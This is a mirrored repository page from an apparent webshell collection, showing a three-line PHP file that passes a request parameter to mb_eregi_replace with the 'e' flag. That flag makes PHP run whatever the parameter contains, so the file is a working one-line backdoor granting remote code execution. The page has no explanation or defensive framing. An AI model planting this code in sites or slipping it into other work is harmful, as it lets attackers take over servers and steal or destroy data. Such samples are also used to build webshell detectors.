mirror of
https://github.com/tennc/webshell
synced 2025-02-16 17:58:23 +00:00
3 lines
64 B
PHP
3 lines
64 B
PHP
<?php
|
|
mb_eregi_replace('\d', $_REQUEST['x'], '1', 'e');
|
|
?>
|